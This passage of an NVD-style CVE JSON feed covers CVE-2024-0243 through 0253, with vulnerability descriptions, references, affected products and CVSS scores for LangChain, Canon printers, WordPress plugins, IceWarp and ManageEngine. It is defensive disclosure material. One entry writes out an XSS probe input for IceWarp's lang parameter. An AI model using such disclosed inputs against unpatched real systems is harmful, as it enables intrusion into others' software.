"data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0243", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/langchain-ai/langchain/commit/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22", "name" : "https://github.com/langchain-ai/langchain/commit/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/langchain-ai/langchain/commit/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22", "name" : "https://github.com/langchain-ai/langchain/commit/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/langchain-ai/langchain/pull/15559", "name" : "https://github.com/langchain-ai/langchain/pull/15559", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://github.com/langchain-ai/langchain/pull/15559", "name" : "https://github.com/langchain-ai/langchain/pull/15559", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://huntr.com/bounties/370904e7-10ac-40a4-a8d4-e2d16e1ca861", "name" : "https://huntr.com/bounties/370904e7-10ac-40a4-a8d4-e2d16e1ca861", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/370904e7-10ac-40a4-a8d4-e2d16e1ca861", "name" : "https://huntr.com/bounties/370904e7-10ac-40a4-a8d4-e2d16e1ca861", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "With the following crawler configuration:\n\n```python\nfrom bs4 import BeautifulSoup as Soup\n\nurl = \"https://example.com\"\nloader = RecursiveUrlLoader(\n url=url, max_depth=2, extractor=lambda x: Soup(x, \"html.parser\").text\n)\ndocs = loader.load()\n```\n\nAn attacker in control of the contents of `https://example.com` could place a malicious HTML file in there with links like \"https://example.completely.different/my_file.html\" and the crawler would proceed to download that file as well even though `prevent_outside=True`.\n\nhttps://github.com/langchain-ai/langchain/blob/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22/libs/community/langchain_community/document_loaders/recursive_url_loader.py#L51-L51\n\nResolved in https://github.com/langchain-ai/langchain/pull/15559" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:langchain:langchain:*:*:*:*:*:*:*:*", "versionEndExcluding" : "0.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-26T16:27Z", "lastModifiedDate" : "2025-02-25T22:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0244", "ASSIGNER" : "canon@example.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://canon.jp/support/support-info/240205vulnerability-response", "name" : "https://canon.jp/support/support-info/240205vulnerability-response", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://canon.jp/support/support-info/240205vulnerability-response", "name" : "https://canon.jp/support/support-info/240205vulnerability-response", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://psirt.canon/advisory-information/cp2024-001/", "name" : "https://psirt.canon/advisory-information/cp2024-001/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://psirt.canon/advisory-information/cp2024-001/", "name" : "https://psirt.canon/advisory-information/cp2024-001/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.canon-europe.com/support/product-security-latest-news/", "name" : "https://www.canon-europe.com/support/product-security-latest-news/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.canon-europe.com/support/product-security-latest-news/", "name" : "https://www.canon-europe.com/support/product-security-latest-news/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers", "name" : "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers", "name" : "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Buffer overflow in CPCA PCFAX number process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*:Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS MF750C Series/Color imageCLASS X MF1333C firmware v03.07 and earlier sold in US. i-SENSYS MF754Cdw/C1333iF firmware v03.07 and earlier sold in Europe.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:canon:i-sensys_mf754cdw_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "03.07", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:canon:i-sensys_mf754cdw:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:canon:i-sensys_x_c1333if_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "03.07", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:canon:i-sensys_x_c1333if:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:canon:mf755cdw_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "03.07", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:canon:mf755cdw:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:canon:mf753cdw_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "03.07", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:canon:mf753cdw:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:canon:mf751cdw_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "03.07", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:canon:mf751cdw:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:canon:mf1333c_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "03.07", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:canon:mf1333c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:canon:lbp1333c_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "03.07", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:canon:lbp1333c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-06T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0245", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-200" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/hamza417/inure/commit/a0c3e68b0542bcd7007c93618e0d50a5331de061", "name" : "https://github.com/hamza417/inure/commit/a0c3e68b0542bcd7007c93618e0d50a5331de061", "refsource" : "", "tags" : [ ] }, { "url" : "https://huntr.com/bounties/2108644e-9e54-4236-932d-f204fc68b607", "name" : "https://huntr.com/bounties/2108644e-9e54-4236-932d-f204fc68b607", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A misconfiguration in the AndroidManifest.xml file in hamza417/inure before build97 allows for task hijacking. This vulnerability permits malicious applications to inherit permissions of the vulnerable app, potentially leading to the exposure of sensitive information. An attacker can create a malicious app that hijacks the legitimate Inure app, intercepting and stealing sensitive information when installed on the victim's device. This issue affects all Android versions before Android 11." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-03-20T10:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0246", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.249759", "name" : "https://vuldb.com/?ctiid.249759", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249759", "name" : "https://vuldb.com/?ctiid.249759", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249759", "name" : "https://vuldb.com/?id.249759", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249759", "name" : "https://vuldb.com/?id.249759", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in IceWarp 12.0.2.1/12.0.3.1. This affects an unknown part of the file /install/ of the component Utility Download Handler. The manipulation of the argument lang with the input 1%27\"()%26%25 leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249759. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:icewarp:icewarp:12.0.3.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:icewarp:icewarp:12.0.2.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-05T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0247", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/13xhOZ3Zg-XoviVC744PPDorTxYbLUgbv/view?usp=sharing", "name" : "https://drive.google.com/file/d/13xhOZ3Zg-XoviVC744PPDorTxYbLUgbv/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/13xhOZ3Zg-XoviVC744PPDorTxYbLUgbv/view?usp=sharing", "name" : "https://drive.google.com/file/d/13xhOZ3Zg-XoviVC744PPDorTxYbLUgbv/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249778", "name" : "https://vuldb.com/?ctiid.249778", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249778", "name" : "https://vuldb.com/?ctiid.249778", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249778", "name" : "https://vuldb.com/?id.249778", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249778", "name" : "https://vuldb.com/?id.249778", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in CodeAstro Online Food Ordering System 1.0. This vulnerability affects unknown code of the file /admin/ of the component Admin Panel. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249778 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:online_food_ordering_system_project:online_food_ordering_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-05T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0248", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df/", "name" : "https://wpscan.com/vulnerability/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df/", "name" : "https://wpscan.com/vulnerability/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The EazyDocs WordPress plugin before 2.4.0 re-introduced CVE-2023-6029 (https://wpscan.com/vulnerability/7a0aaf85-8130-4fd7-8f09-f8edc929597e/) in 2.3.8, allowing any authenticated users, such as subscriber to delete arbitrary posts, as well as add and delete documents/sections. The issue was partially fixed in 2.3.9." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:spider-themes:eazydocs:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.4.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-12T16:15Z", "lastModifiedDate" : "2025-05-07T21:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0249", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/e7ee3e73-1086-421f-b586-d415a45a6c8e/", "name" : "https://wpscan.com/vulnerability/e7ee3e73-1086-421f-b586-d415a45a6c8e/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Advanced Schedule Posts WordPress plugin through 2.1.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admins." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hijiriworld:advanced_schedule_posts:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.1.8", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-09T18:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0250", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-601" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/", "name" : "https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/", "name" : "https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Analytics Insights for Google Analytics 4 (AIWP) WordPress plugin before 6.3 is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:deconf:analytics_insights:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-12T16:15Z", "lastModifiedDate" : "2025-03-26T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0251", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L2170", "name" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L2170", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L2170", "name" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L2170", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L287", "name" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L287", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L287", "name" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L287", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.97/includes/class-aws-integrations.php#L2104", "name" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.97/includes/class-aws-integrations.php#L2104", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.97/includes/class-aws-integrations.php#L2104", "name" : "https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.97/includes/class-aws-integrations.php#L2104", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Advanced Woo Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search parameter in all versions up to, and including, 2.96 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects sites when the Dynamic Content for Elementor plugin is also installed." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:advanced-woo-search:advanced_woo_search:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.96", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-13T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0252", "ASSIGNER" : "cna@manageengine.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html", "name" : "https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html", "name" : "https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "ManageEngine ADSelfService Plus versions 6401 and below are vulnerable to the remote code execution due to the improper handling in the load balancer component. Authentication is required in order to exploit this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.4:6400:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*", "versionEndExcluding" : "6.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.4:6401:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-11T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0253", "ASSIGNER" : "cna@manageengine.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html", "name" : "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html", "name" : "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "ManageEngine ADAudit Plus versions 7270 and below are vulnerable to the Authenticated SQL injection in home Graph-Data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : 